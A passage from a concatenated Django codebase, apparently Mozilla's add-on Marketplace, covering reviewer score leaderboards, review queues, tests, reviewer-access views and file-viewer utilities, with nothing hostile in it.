                 .exclude(user__groups__name__in=('No Reviewer Incentives',
                                                  'Staff', 'Admins'))
                 .order_by('-total'))
        if since is not None:
            query = query.filter(created__gte=since)
        if types is not None:
            query = query.filter(note_key__in=types)
        if addon_type is not None:
            query = query.filter(addon__type=addon_type)
        return query

    @classmethod
    def get_leaderboards(cls, user, days=7, types=None, addon_type=None):
        """Returns leaderboards with ranking for the past given days.

        This will return a dict of 3 items::

            {'leader_top': [...],
             'leader_near: [...],
             'user_rank': (int)}

        If the user is not in the leaderboard, or if the user is in the top 5,
        'leader_near' will be an empty list and 'leader_top' will contain 5
        elements instead of the normal 3.
        """
        key = cls.get_key('get_leaderboards:%s' % user.id)
        val = cache.get(key)
        if val is not None:
            return val
        week_ago = datetime.date.today() - datetime.timedelta(days=days)
        leader_top = []
        leader_near = []
        query = cls._leaderboard_query(since=week_ago, types=types,
                                       addon_type=addon_type)
        scores = []
        user_rank = 0
        in_leaderboard = False
        for rank, row in enumerate(query, 1):
            user_id, name, total = row
            scores.append({
                'user_id': user_id,
                'name': name,
                'rank': rank,
                'total': int(total),
            })
            if user_id == user.id:
                user_rank = rank
                in_leaderboard = True
        if not in_leaderboard:
            leader_top = scores[:5]
        else:
            if user_rank <= 5:  # User is in top 5, show top 5.
                leader_top = scores[:5]
            else:
                leader_top = scores[:3]
                leader_near = [scores[user_rank - 2], scores[user_rank - 1]]
                try:
                    leader_near.append(scores[user_rank])
                except IndexError:
                    pass  # User is last on the leaderboard.
        val = {
            'leader_top': leader_top,
            'leader_near': leader_near,
            'user_rank': user_rank,
        }
        cache.set(key, val, None)
        return val

    @classmethod
    def all_users_by_score(cls):
        """
        Returns reviewers ordered by highest total points first.
        """
        query = cls._leaderboard_query()
        scores = []
        for row in query:
            user_id, name, total = row
            # Find the highest level whose threshold the total clears.
            user_level = len(amo.REVIEWED_LEVELS) - 1
            for i, level in enumerate(amo.REVIEWED_LEVELS):
                if total < level['points']:
                    user_level = i - 1
                    break
            # Only show level if it changes.
            if user_level < 0:
                level = ''
            else:
                level = amo.REVIEWED_LEVELS[user_level]['name']
            scores.append({
                'user_id': user_id,
                'name': name,
                'total': int(total),
                'level': level,
            })
        prev = None
        for score in reversed(scores):
            if score['level'] == prev:
                score['level'] = ''
            else:
                prev = score['level']
        return scores
class EscalationQueue(amo.models.ModelBase):
    """Queue of add-ons escalated for senior-reviewer attention."""
    addon = models.ForeignKey(Addon)
    class Meta:
        db_table = 'escalation_queue'
class RereviewQueue(amo.models.ModelBase):
    """Queue of already-reviewed add-ons flagged for another review."""
    addon = models.ForeignKey(Addon)
    class Meta:
        db_table = 'rereview_queue'
    @classmethod
    def flag(cls, addon, event, message=None):
        """Put `addon` in the re-review queue (idempotent) and log `event`,
        attaching `message` as the log comment when given."""
        cls.objects.get_or_create(addon=addon)
        if message:
            amo.log(event, addon, addon.current_version,
                    details={'comments': message})
        else:
            amo.log(event, addon, addon.current_version)
########NEW FILE########
__FILENAME__ = test_helpers
# -*- coding: utf-8 -*-
from nose.tools import eq_
import amo
import amo.tests
from addons.models import Addon
from editors import helpers
from files.models import File
from versions.models import Version
class TestCompareLink(amo.tests.TestCase):
    """Tests for helpers.file_compare platform matching."""
    fixtures = ['base/addon_3615', 'base/platforms']
    def setUp(self):
        self.addon = Addon.objects.get(pk=3615)
        self.current = File.objects.get(pk=67442)
        self.version = Version.objects.create(addon=self.addon)
    def test_same_platform(self):
        # A file on the same platform as `current` should be chosen.
        file = File.objects.create(version=self.version,
                                   platform=self.current.platform)
        eq_(file.pk, helpers.file_compare(self.current, self.version).pk)
class TestGetPosition(amo.tests.TestCase):
    """Tests for helpers.get_position (app review-queue position/ETA)."""
    def setUp(self):
        # Add a public, reviewed app for measure. It took 4 days for this app
        # to get reviewed.
        self.public_app = amo.tests.app_factory(
            version_kw={'nomination': self.days_ago(7),
                        'reviewed': self.days_ago(3)})
        # Took 8 days for another public app to get reviewed.
        amo.tests.app_factory(
            version_kw={'nomination': self.days_ago(10),
                        'reviewed': self.days_ago(2)})
        # Add to the queue 2 pending apps for good measure.
        amo.tests.app_factory(
            status=amo.STATUS_PENDING,
            file_kw={'status': amo.STATUS_PENDING},
            version_kw={'nomination': self.days_ago(3)})
        amo.tests.app_factory(
            status=amo.STATUS_PENDING,
            file_kw={'status': amo.STATUS_PENDING},
            version_kw={'nomination': self.days_ago(1)})
        # A deleted app that shouldn't change calculations.
        amo.tests.app_factory(
            status=amo.STATUS_DELETED,
            file_kw={'status': amo.STATUS_PENDING},
            version_kw={'nomination': self.days_ago(1)})
    def test_min(self):
        # Even an app pending far longer than the average review time
        # should report at least 1 day remaining.
        pending_app = amo.tests.app_factory(
            status=amo.STATUS_PENDING,
            file_kw={'status': amo.STATUS_PENDING},
            version_kw={'nomination': self.days_ago(42)})
        pos = helpers.get_position(pending_app)
        eq_(pos['days'], 1)
    def test_packaged_app(self):
        # Packaged apps with a pending version are positioned by their
        # latest (pending) version, not the public one.
        self.public_app.update(is_packaged=True)
        version = amo.tests.version_factory(
            addon=self.public_app, file_kw={'status': amo.STATUS_PENDING})
        self.public_app.reload()
        eq_(self.public_app.latest_version, version)
        self._test_position(self.public_app)
    def test_pending_app(self):
        pending_app = amo.tests.app_factory(
            status=amo.STATUS_PENDING,
            file_kw={'status': amo.STATUS_PENDING})
        self._test_position(pending_app)
    def _test_position(self, app):
        # Shared assertions for an app nominated 2 days ago.
        app.latest_version.update(nomination=self.days_ago(2))
        pos = helpers.get_position(app)
        # We set the nomination to 2 days ago.
        eq_(pos['days_in_queue'], 2)
        # There are three pending apps.
        eq_(pos['total'], 3)
        # It took 12 days for 2 apps to get reviewed, giving us an average of
        # 6 days to go from pending->public, but we've already waited 2 days.
        eq_(pos['days'], 4)
        # There is one pending app in front of us.
        eq_(pos['pos'], 2)
########NEW FILE########
__FILENAME__ = test_models
# -*- coding: utf8 -*-
import time
from nose.tools import eq_
import amo
import amo.tests
from editors.models import RereviewQueue, ReviewerScore
from users.models import UserProfile
class TestReviewerScore(amo.tests.TestCase):
    """Tests for the ReviewerScore model: event mapping, point awards,
    totals, leaderboards, breakdowns and cache invalidation."""
    fixtures = ['base/users']
    def setUp(self):
        self.addon = amo.tests.addon_factory(status=amo.STATUS_NOMINATED)
        self.app = amo.tests.app_factory(status=amo.STATUS_NOMINATED)
        self.user = UserProfile.objects.get(email='[email protected]')
    def _give_points(self, user=None, addon=None, status=None):
        # Award points, defaulting to self.user / self.addon / the
        # addon's own status.
        user = user or self.user
        addon = addon or self.addon
        ReviewerScore.award_points(user, addon, status or addon.status)
    def check_event(self, type, status, event, **kwargs):
        # Assert that (addon type, status) maps to the expected score event.
        self.addon.type = type
        eq_(ReviewerScore.get_event(self.addon, status, **kwargs), event, (
            'Score event for type:%s and status:%s was not %s' % (
                type, status, event)))
    def test_events_addons(self):
        # Exhaustively check every (type, status) combination against the
        # REVIEWED_<TYPE>_<STATUS> / REVIEWED_<TYPE> constant naming scheme.
        types = {
            amo.ADDON_ANY: None,
            amo.ADDON_EXTENSION: 'ADDON',
            amo.ADDON_THEME: 'THEME',
            amo.ADDON_DICT: 'DICT',
            amo.ADDON_SEARCH: 'SEARCH',
            amo.ADDON_LPAPP: 'LP',
            amo.ADDON_LPADDON: 'LP',
            amo.ADDON_PLUGIN: 'ADDON',
            amo.ADDON_API: 'ADDON',
            amo.ADDON_PERSONA: 'PERSONA',
            # WEBAPP is special cased below.
        }
        statuses = {
            amo.STATUS_NULL: None,
            amo.STATUS_UNREVIEWED: 'PRELIM',
            amo.STATUS_PENDING: None,
            amo.STATUS_NOMINATED: 'FULL',
            amo.STATUS_PUBLIC: 'UPDATE',
            amo.STATUS_DISABLED: None,
            amo.STATUS_BETA: None,
            amo.STATUS_LITE: 'PRELIM',
            amo.STATUS_LITE_AND_NOMINATED: 'FULL',
            amo.STATUS_PURGATORY: None,
            amo.STATUS_DELETED: None,
            amo.STATUS_REJECTED: None,
            amo.STATUS_PUBLIC_WAITING: None,
            amo.STATUS_REVIEW_PENDING: None,
            amo.STATUS_BLOCKED: None,
        }
        for tk, tv in types.items():
            for sk, sv in statuses.items():
                try:
                    event = getattr(amo, 'REVIEWED_%s_%s' % (tv, sv))
                except AttributeError:
                    try:
                        event = getattr(amo, 'REVIEWED_%s' % tv)
                    except AttributeError:
                        event = None
                self.check_event(tk, sk, event)
    def test_events_webapps(self):
        # Webapps map to hosted/packaged/rereview/update events.
        self.addon = amo.tests.app_factory()
        self.check_event(self.addon.type, amo.STATUS_PENDING,
                         amo.REVIEWED_WEBAPP_HOSTED)
        RereviewQueue.objects.create(addon=self.addon)
        self.check_event(self.addon.type, amo.STATUS_PUBLIC,
                         amo.REVIEWED_WEBAPP_REREVIEW, in_rereview=True)
        RereviewQueue.objects.all().delete()
        self.addon.is_packaged = True
        self.check_event(self.addon.type, amo.STATUS_PENDING,
                         amo.REVIEWED_WEBAPP_PACKAGED)
        self.check_event(self.addon.type, amo.STATUS_PUBLIC,
                         amo.REVIEWED_WEBAPP_UPDATE)
    def test_award_points(self):
        self._give_points()
        eq_(ReviewerScore.objects.all()[0].score,
            amo.REVIEWED_SCORES[amo.REVIEWED_ADDON_FULL])
    def test_award_moderation_points(self):
        ReviewerScore.award_moderation_points(self.user, self.addon, 1)
        score = ReviewerScore.objects.all()[0]
        eq_(score.score, amo.REVIEWED_SCORES.get(amo.REVIEWED_ADDON_REVIEW))
        eq_(score.note_key, amo.REVIEWED_ADDON_REVIEW)
    def test_get_total(self):
        user2 = UserProfile.objects.get(email='[email protected]')
        self._give_points()
        self._give_points(status=amo.STATUS_LITE)
        self._give_points(user=user2, status=amo.STATUS_NOMINATED)
        eq_(ReviewerScore.get_total(self.user),
            amo.REVIEWED_SCORES[amo.REVIEWED_ADDON_FULL] +
            amo.REVIEWED_SCORES[amo.REVIEWED_ADDON_PRELIM])
        eq_(ReviewerScore.get_total(user2),
            amo.REVIEWED_SCORES[amo.REVIEWED_ADDON_FULL])
    def test_get_recent(self):
        user2 = UserProfile.objects.get(email='[email protected]')
        self._give_points()
        time.sleep(1)  # Wait 1 sec so ordering by created is checked.
        self._give_points(status=amo.STATUS_LITE)
        self._give_points(user=user2)
        scores = ReviewerScore.get_recent(self.user)
        # Most recent first; user2's points are excluded.
        eq_(len(scores), 2)
        eq_(scores[0].score, amo.REVIEWED_SCORES[amo.REVIEWED_ADDON_PRELIM])
        eq_(scores[1].score, amo.REVIEWED_SCORES[amo.REVIEWED_ADDON_FULL])
    def test_get_leaderboards(self):
        user2 = UserProfile.objects.get(email='[email protected]')
        self._give_points()
        self._give_points(status=amo.STATUS_LITE)
        self._give_points(user=user2, status=amo.STATUS_NOMINATED)
        leaders = ReviewerScore.get_leaderboards(self.user)
        eq_(leaders['user_rank'], 1)
        eq_(leaders['leader_near'], [])
        eq_(leaders['leader_top'][0]['rank'], 1)
        eq_(leaders['leader_top'][0]['user_id'], self.user.id)
        eq_(leaders['leader_top'][0]['total'],
            amo.REVIEWED_SCORES[amo.REVIEWED_ADDON_FULL] +
            amo.REVIEWED_SCORES[amo.REVIEWED_ADDON_PRELIM])
        eq_(leaders['leader_top'][1]['rank'], 2)
        eq_(leaders['leader_top'][1]['user_id'], user2.id)
        eq_(leaders['leader_top'][1]['total'],
            amo.REVIEWED_SCORES[amo.REVIEWED_ADDON_FULL])
        # Filtering by addon_type only counts matching reviews.
        self._give_points(
            user=user2, addon=amo.tests.addon_factory(type=amo.ADDON_PERSONA))
        leaders = ReviewerScore.get_leaderboards(
            self.user, addon_type=amo.ADDON_PERSONA)
        eq_(len(leaders['leader_top']), 1)
        eq_(leaders['leader_top'][0]['user_id'], user2.id)
    def test_no_admins_or_staff_in_leaderboards(self):
        user2 = UserProfile.objects.get(email='[email protected]')
        self._give_points()
        self._give_points(status=amo.STATUS_LITE)
        self._give_points(user=user2, status=amo.STATUS_NOMINATED)
        leaders = ReviewerScore.get_leaderboards(self.user)
        eq_(leaders['user_rank'], 1)
        eq_(leaders['leader_near'], [])
        eq_(leaders['leader_top'][0]['user_id'], self.user.id)
        eq_(len(leaders['leader_top']), 1)  # Only the editor is here.
        assert user2.id not in [l['user_id'] for l in leaders['leader_top']], (
            'Unexpected admin user found in leaderboards.')
    def test_no_marketplace_points_in_amo_leaderboards(self):
        self._give_points()
        self._give_points(status=amo.STATUS_LITE)
        self._give_points(addon=self.app, status=amo.STATUS_NOMINATED)
        leaders = ReviewerScore.get_leaderboards(self.user,
                                                 types=amo.REVIEWED_AMO)
        eq_(leaders['leader_top'][0]['total'],
            amo.REVIEWED_SCORES[amo.REVIEWED_ADDON_FULL] +
            amo.REVIEWED_SCORES[amo.REVIEWED_ADDON_PRELIM])
    def test_no_amo_points_in_marketplace_leaderboards(self):
        self._give_points()
        self._give_points(status=amo.STATUS_LITE)
        self._give_points(addon=self.app, status=amo.STATUS_NOMINATED)
        leaders = ReviewerScore.get_leaderboards(
            self.user, types=amo.REVIEWED_MARKETPLACE)
        eq_(leaders['leader_top'][0]['total'],
            amo.REVIEWED_SCORES[amo.REVIEWED_WEBAPP_HOSTED])
    def test_get_breakdown(self):
        self._give_points()
        self._give_points(addon=amo.tests.app_factory())
        breakdown = ReviewerScore.get_breakdown(self.user)
        eq_(len(breakdown), 2)
        eq_(set([b.atype for b in breakdown]),
            set([amo.ADDON_EXTENSION, amo.ADDON_WEBAPP]))
    def test_get_breakdown_since(self):
        self._give_points()
        self._give_points(addon=amo.tests.app_factory())
        rs = list(ReviewerScore.objects.all())
        rs[0].update(created=self.days_ago(50))
        breakdown = ReviewerScore.get_breakdown_since(self.user,
                                                      self.days_ago(30))
        eq_(len(breakdown), 1)
        eq_([b.atype for b in breakdown], [rs[1].addon.type])
    def test_get_leaderboards_last(self):
        # When the user is last (rank 6), leader_top has 3 entries and
        # leader_near the two users just above them.
        users = []
        for i in range(6):
            users.append(UserProfile.objects.create(username='user-%s' % i))
        last_user = users.pop(len(users) - 1)
        for u in users:
            self._give_points(user=u)
        # Last user gets lower points by reviewing a persona.
        addon = self.addon
        addon.type = amo.ADDON_PERSONA
        self._give_points(user=last_user, addon=addon)
        leaders = ReviewerScore.get_leaderboards(last_user)
        eq_(leaders['user_rank'], 6)
        eq_(len(leaders['leader_top']), 3)
        eq_(len(leaders['leader_near']), 2)
    def test_all_users_by_score(self):
        user2 = UserProfile.objects.get(email='[email protected]')
        # NOTE(review): mutates the module-level amo.REVIEWED_LEVELS in
        # place; this leaks into other tests in the same process. Consider
        # restoring the value in tearDown.
        amo.REVIEWED_LEVELS[0]['points'] = 180
        self._give_points()
        self._give_points(status=amo.STATUS_LITE)
        self._give_points(user=user2, status=amo.STATUS_NOMINATED)
        users = ReviewerScore.all_users_by_score()
        eq_(len(users), 2)
        # First user.
        eq_(users[0]['total'], 180)
        eq_(users[0]['user_id'], self.user.id)
        eq_(users[0]['level'], amo.REVIEWED_LEVELS[0]['name'])
        # Second user.
        eq_(users[1]['total'], 120)
        eq_(users[1]['user_id'], user2.id)
        eq_(users[1]['level'], '')
    def test_caching(self):
        # Each getter hits the DB once, then serves from cache until new
        # points invalidate it.
        self._give_points()
        with self.assertNumQueries(1):
            ReviewerScore.get_total(self.user)
        with self.assertNumQueries(0):
            ReviewerScore.get_total(self.user)
        with self.assertNumQueries(1):
            ReviewerScore.get_recent(self.user)
        with self.assertNumQueries(0):
            ReviewerScore.get_recent(self.user)
        with self.assertNumQueries(1):
            ReviewerScore.get_leaderboards(self.user)
        with self.assertNumQueries(0):
            ReviewerScore.get_leaderboards(self.user)
        with self.assertNumQueries(1):
            ReviewerScore.get_breakdown(self.user)
        with self.assertNumQueries(0):
            ReviewerScore.get_breakdown(self.user)
        # New points invalidates all caches.
        self._give_points()
        with self.assertNumQueries(1):
            ReviewerScore.get_total(self.user)
        with self.assertNumQueries(1):
            ReviewerScore.get_recent(self.user)
        with self.assertNumQueries(1):
            ReviewerScore.get_leaderboards(self.user)
        with self.assertNumQueries(1):
            ReviewerScore.get_breakdown(self.user)
########NEW FILE########
__FILENAME__ = views
import functools
from django.conf import settings
from django.core.cache import cache
from django.core.exceptions import PermissionDenied
from django.views.decorators.cache import never_cache
import amo
from access import acl
from amo.decorators import json_view, login_required
from users.models import UserProfile
from mkt.reviewers.utils import AppsReviewing
def _view_on_get(request):
    """Tell whether this request may view reviewer pages read-only.

    Only GET requests from users in a group carrying the
    'ReviewerTools:View' rule are allowed.
    """
    if request.method != 'GET':
        return False
    return acl.action_allowed(request, 'ReviewerTools', 'View')
def reviewer_required(only=None, region=None):
    """Requires the user to be logged in as a reviewer or admin, or allows
    someone with rule 'ReviewerTools:View' for GET requests.
    Reviewer is someone who is in one of the groups with the following
    permissions:
        Addons:Review
        Apps:Review
        Personas:Review
    If only is provided, it will only check for a certain type of reviewer.
    Valid values for only are: addon, app, persona.

    Can be used both with parens (`@reviewer_required(only='app')`) and
    without (`@reviewer_required`) -- see the callable check below.
    """
    def decorator(f):
        @login_required
        @functools.wraps(f)
        def wrapper(request, *args, **kw):
            # NOTE(review): the `region` argument of reviewer_required is
            # never used here -- the region comes from the view kwargs
            # instead. Confirm whether the parameter is dead.
            if (acl.check_reviewer(request, only, region=kw.get('region')) or
                _view_on_get(request)):
                return f(request, *args, **kw)
            else:
                raise PermissionDenied
        return wrapper
    # If decorator has no args, and is "paren-less", it's callable.
    if callable(only):
        return decorator(only)
    else:
        return decorator
@never_cache
@json_view
@reviewer_required
def review_viewing(request):
    """Record/report who is currently viewing a review page.

    POST with 'addon_id'. Returns the viewing user's id, display name,
    whether it is the requesting user, and the ping interval in seconds.
    """
    if 'addon_id' not in request.POST:
        return {}
    addon_id = request.POST['addon_id']
    user_id = request.amo_user.id
    current_name = ''
    is_user = 0
    key = '%s:review_viewing:%s' % (settings.CACHE_PREFIX, addon_id)
    interval = amo.EDITOR_VIEWING_INTERVAL
    # Check who is viewing.
    currently_viewing = cache.get(key)
    # If nobody is viewing or current user is, set current user as viewing
    if not currently_viewing or currently_viewing == user_id:
        # We want to save it for twice as long as the ping interval,
        # just to account for latency and the like.
        cache.set(key, user_id, interval * 2)
        currently_viewing = user_id
        current_name = request.amo_user.name
        is_user = 1
    else:
        current_name = UserProfile.objects.get(pk=currently_viewing).name
    AppsReviewing(request).add(addon_id)
    return {'current': currently_viewing, 'current_name': current_name,
            'is_user': is_user, 'interval_seconds': interval}
@never_cache
@json_view
@reviewer_required
def queue_viewing(request):
    """Report which other reviewers are viewing the posted add-ons.

    POST with 'addon_ids' as a comma-separated id list. Returns a dict of
    {addon_id: display_name} for every add-on currently being viewed by
    someone other than the requesting user.
    """
    ids = request.POST.get('addon_ids')
    if ids is None:
        return {}
    me = request.amo_user.id
    result = {}
    for raw_id in ids.split(','):
        addon_id = raw_id.strip()
        cache_key = '%s:review_viewing:%s' % (settings.CACHE_PREFIX, addon_id)
        viewer_id = cache.get(cache_key)
        if not viewer_id or viewer_id == me:
            continue
        profile = UserProfile.objects.get(id=viewer_id)
        result[addon_id] = profile.display_name
    return result
########NEW FILE########
__FILENAME__ = admin
from django.contrib import admin
from .models import File
class FileAdmin(admin.ModelAdmin):
    """Django admin configuration for File rows."""
    # Raw id input avoids rendering a huge <select> of all versions.
    raw_id_fields = ('version',)
admin.site.register(File, FileAdmin)
########NEW FILE########
__FILENAME__ = cron
import hashlib
import os
import shutil
import stat
import time
from django.conf import settings
from django.core.cache import cache
import commonware.log
import cronjobs
from files.models import FileValidation
log = commonware.log.getLogger('z.cron')
@cronjobs.register
def cleanup_extracted_file():
    """Remove file-viewer extractions older than one hour.

    Walks TMP_PATH/file_viewer, deletes every extraction tree whose atime
    is over an hour old, and drops the corresponding memoized file-viewer
    cache entry so stale data is not served afterwards.
    """
    log.info('Removing extracted files for file viewer.')
    root = os.path.join(settings.TMP_PATH, 'file_viewer')
    for path in os.listdir(root):
        full = os.path.join(root, path)
        age = time.time() - os.stat(full)[stat.ST_ATIME]
        if age > (60 * 60):
            log.debug('Removing extracted files: %s, %dsecs old.' %
                      (full, age))
            shutil.rmtree(full)
            # Nuke out the file and diff caches when the file gets removed.
            # Entries are expected to be named after numeric File ids;
            # skip anything that isn't (renamed `id` -> `file_id` so the
            # builtin is not shadowed).
            file_id = os.path.basename(path)
            try:
                int(file_id)
            except ValueError:
                continue
            key = hashlib.md5()
            key.update(str(file_id))
            cache.delete('%s:memoize:%s:%s' % (settings.CACHE_PREFIX,
                         'file-viewer', key.hexdigest()))
@cronjobs.register
def cleanup_validation_results():
    """Will remove all validation results. Used when the validator is
    upgraded and results may no longer be relevant."""
    # With a large enough number of objects not using no_cache() tracebacks.
    # (Renamed the local from `all` so the builtin is not shadowed.)
    qs = FileValidation.objects.no_cache().all()
    log.info('Removing %s old validation results.' % (qs.count()))
    qs.delete()
########NEW FILE########
__FILENAME__ = decorators
from datetime import datetime
import functools
import commonware.log
from cache_nuggets.lib import Token
from django import http
from django.core.exceptions import ObjectDoesNotExist, PermissionDenied
from django.shortcuts import get_object_or_404
from django.utils.http import http_date
import amo
from access import acl
from files.models import File
from mkt.files.helpers import DiffHelper, FileViewer
log = commonware.log.getLogger('z.addons')
def allowed(request, file):
    """Return True if `request`'s user may view `file`'s source.

    Reviewers are always allowed. Otherwise the add-on must either expose
    its source (view_source + reviewed status) or the user must be an
    owner/viewer/dev of the add-on. Raises PermissionDenied when not
    allowed, Http404 when the file has no add-on.
    """
    allowed = acl.check_reviewer(request)
    if not allowed:
        try:
            addon = file.version.addon
        except ObjectDoesNotExist:
            raise http.Http404
        if addon.view_source and addon.status in amo.REVIEWED_STATUSES:
            allowed = True
        else:
            allowed = acl.check_addon_ownership(request, addon, viewer=True,
                                                dev=True)
    if not allowed:
        raise PermissionDenied
    return True
def _get_value(obj, key, value, cast=None):
    """Select file `key` on a (Diff)FileViewer and pull `value` from the
    selection.

    `obj` may be a DiffHelper (its `.left` viewer is used) or a FileViewer.
    NOTE(review): the `key` parameter is immediately overwritten by
    obj.get_default(key) -- presumably it is only a fallback; confirm.
    Returns `cast(value)` when a cast is given, else the raw value (or the
    incoming `value` argument when nothing is selected).
    """
    obj = getattr(obj, 'left', obj)
    key = obj.get_default(key)
    obj.select(key)
    if obj.selected:
        value = obj.selected.get(value)
    return cast(value) if cast else value
def last_modified(request, obj, key=None, **kw):
    """Last-modified callback for file-viewer responses: the selected
    file's mtime as a datetime."""
    return _get_value(obj, key, 'modified', datetime.fromtimestamp)
def etag(request, obj, key=None, **kw):
    """ETag callback for file-viewer responses: the selected file's md5."""
    return _get_value(obj, key, 'md5')
def webapp_file_view(func, **kwargs):
    """Decorator: resolve `file_id` to a FileViewer, enforce access, and
    stamp ETag/Last-Modified from the selected file onto the response."""
    @functools.wraps(func)
    def wrapper(request, file_id, *args, **kw):
        file_ = get_object_or_404(File, pk=file_id)
        # `allowed` raises on denial; the is-not-True check mirrors the
        # compare view below and keeps any non-True sentinel pass-through.
        result = allowed(request, file_)
        if result is not True:
            return result
        try:
            obj = FileViewer(file_)
        except ObjectDoesNotExist:
            raise http.Http404
        response = func(request, obj, *args, **kw)
        if obj.selected:
            response['ETag'] = '"%s"' % obj.selected.get('md5')
            response['Last-Modified'] = http_date(obj.selected.get('modified'))
        return response
    return wrapper
def compare_webapp_file_view(func, **kwargs):
    """Decorator: resolve two file ids to a DiffHelper, enforce access on
    both files, and stamp ETag/Last-Modified from the left selection."""
    @functools.wraps(func)
    def wrapper(request, one_id, two_id, *args, **kw):
        one = get_object_or_404(File, pk=one_id)
        two = get_object_or_404(File, pk=two_id)
        for obj in [one, two]:
            result = allowed(request, obj)
            if result is not True:
                return result
        try:
            obj = DiffHelper(one, two)
        except ObjectDoesNotExist:
            raise http.Http404
        response = func(request, obj, *args, **kw)
        if obj.left.selected:
            response['ETag'] = '"%s"' % obj.left.selected.get('md5')
            response['Last-Modified'] = http_date(obj.left.selected
                                                  .get('modified'))
        return response
    return wrapper
def webapp_file_view_token(func, **kwargs):
    """Decorator: like webapp_file_view but authenticated by a one-time
    token (?token=...) scoped to (file id, key) instead of the session."""
    @functools.wraps(func)
    def wrapper(request, file_id, key, *args, **kw):
        viewer = FileViewer(get_object_or_404(File, pk=file_id))
        token = request.GET.get('token')
        if not token:
            log.error('Denying access to %s, no token.' % viewer.file.id)
            raise PermissionDenied
        if not Token.valid(token, [viewer.file.id, key]):
            log.error('Denying access to %s, token invalid.' % viewer.file.id)
            raise PermissionDenied
        return func(request, viewer, key, *args, **kw)
    return wrapper
########NEW FILE########
__FILENAME__ = forms
from collections import defaultdict
from django import forms
from django.forms import widgets
import commonware.log
import happyforms
import jinja2
from tower import ugettext as _
import amo
from files.models import File
from versions.models import Version
log = commonware.log.getLogger('z.files')
class FileSelectWidget(widgets.Select):
    """Select widget grouping file choices by version, de-duplicating
    files that share the same hash, and annotating status."""
    def render_options(self, choices, selected_choices):
        def option(files, label=None):
            # Render one <option> for a group of hash-identical files.
            addon = files[0].version.addon
            # Make sure that if there's a non-disabled version,
            # that's the one we use for the ID.
            files.sort(lambda a, b: ((a.status == amo.STATUS_DISABLED) -
                                     (b.status == amo.STATUS_DISABLED)))
            if label is None:
                # NOTE(review): `f` here is a closure over the loop
                # variables of render_options (Python 2 for-loop leakage),
                # and `os` is just a local name, not the os module.
                # Fragile -- confirm before touching.
                label = u', '.join(unicode(os.platform) for os in f)
            output = [u'<option value="', jinja2.escape(files[0].id), u'" ']
            if files[0].status == amo.STATUS_DISABLED:
                # Disabled files can be diffed on Marketplace.
                output.append(u' disabled')
            if selected in files:
                output.append(u' selected="true"')
            status = set(u'status-%s' % amo.STATUS_CHOICES_API[f.status]
                         for f in files)
            output.extend((u' class="', jinja2.escape(' '.join(status)), u'"'))
            # Extend apps to show file status in selects.
            label += ' (%s)' % amo.STATUS_CHOICES_API[f.status]
            output.extend((u'>', jinja2.escape(label), u'</option>\n'))
            return output
        if selected_choices[0]:
            selected = File.objects.get(id=selected_choices[0])
        else:
            selected = None
        file_ids = [int(c[0]) for c in self.choices if c[0]]
        output = []
        output.append(u'<option></option>')
        vers = Version.objects.filter(files__id__in=file_ids).distinct()
        for ver in vers.order_by('-created'):
            # Group this version's files by content hash so identical
            # uploads collapse into one option.
            hashes = defaultdict(list)
            for f in ver.files.filter(id__in=file_ids):
                hashes[f.hash].append(f)
            distinct_files = hashes.values()
            if len(distinct_files) == 1:
                output.extend(option(distinct_files[0], ver.version))
            elif distinct_files:
                output.extend((u'<optgroup label="',
                               jinja2.escape(ver.version), u'">'))
                for f in distinct_files:
                    output.extend(option(f))
                output.append(u'</optgroup>')
        return jinja2.Markup(u''.join(output))
class FileCompareForm(happyforms.Form):
    """Form picking two files of one add-on to diff against each other."""
    left = forms.ModelChoiceField(queryset=File.objects.all(),
                                  widget=FileSelectWidget)
    right = forms.ModelChoiceField(queryset=File.objects.all(),
                                   widget=FileSelectWidget, required=False)
    def __init__(self, *args, **kw):
        # Restrict both choice fields to the given add-on's files.
        self.addon = kw.pop('addon')
        super(FileCompareForm, self).__init__(*args, **kw)
        queryset = File.objects.filter(version__addon=self.addon)
        self.fields['left'].queryset = queryset
        self.fields['right'].queryset = queryset
    def clean(self):
        # Reject diffing a file against itself.
        if (not self.errors and
            self.cleaned_data.get('right') == self.cleaned_data['left']):
            raise forms.ValidationError(
                _('Cannot diff a version against itself'))
        return self.cleaned_data
########NEW FILE########
__FILENAME__ = models
import hashlib
import json
import os
import re
import unicodedata
import uuid
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.db import models
from django.dispatch import receiver
from django.template.defaultfilters import slugify
from django.utils.encoding import smart_str
import commonware
from uuidfield.fields import UUIDField
import amo
import amo.models
import amo.utils
from amo.decorators import use_master
from amo.storage_utils import copy_stored_file, move_stored_file
from amo.urlresolvers import reverse
from applications.models import Application, AppVersion
log = commonware.log.getLogger('z.files')
# Acceptable extensions.
EXTENSIONS = ('.webapp', '.json', '.zip')
class File(amo.models.OnChangeMixin, amo.models.ModelBase):
    """A single uploaded file belonging to a Version of an add-on/app."""
    STATUS_CHOICES = amo.STATUS_CHOICES.items()
    version = models.ForeignKey('versions.Version', related_name='files')
    platform = models.ForeignKey('Platform', default=amo.PLATFORM_ALL.id)
    filename = models.CharField(max_length=255, default='')
    size = models.PositiveIntegerField(default=0)  # In bytes.
    hash = models.CharField(max_length=255, default='')
    status = models.PositiveSmallIntegerField(choices=STATUS_CHOICES,
                                              default=amo.STATUS_UNREVIEWED)
    datestatuschanged = models.DateTimeField(null=True, auto_now_add=True)
    reviewed = models.DateTimeField(null=True)
    # Whether a webapp uses flash or not.
    uses_flash = models.BooleanField(default=False, db_index=True)
    class Meta(amo.models.ModelBase.Meta):
        db_table = 'files'
    def __unicode__(self):
        return unicode(self.id)
    @property
    def amo_platform(self):
        # TODO: Ideally this would be ``platform``.
        return amo.PLATFORMS[self.platform_id]
    @property
    def has_been_validated(self):
        # True when a FileValidation row exists for this file.
        try:
            self.validation
        except FileValidation.DoesNotExist:
            return False
        else:
            return True
    def get_url_path(self, src):
        """Absolute download URL for this file, tagged with ?src=."""
        from amo.helpers import urlparams, absolutify
        url = os.path.join(reverse('downloads.file', args=[self.id]),
                           self.filename)
        # Firefox's Add-on Manager needs absolute urls.
        return absolutify(urlparams(url, src=src))
    @classmethod
    def from_upload(cls, upload, version, platform, parse_data={}):
        """Create a File (status PENDING) from a FileUpload: name, size,
        hash it, save it, and move the payload out of the temp location.

        NOTE(review): `parse_data` is unused here, and a mutable default
        argument -- confirm callers before removing/changing it.
        """
        upload.path = amo.utils.smart_path(nfd_str(upload.path))
        ext = os.path.splitext(upload.path)[1]
        f = cls(version=version, platform=platform)
        f.filename = f.generate_filename(extension=ext or '.zip')
        f.size = storage.size(upload.path)  # Size in bytes.
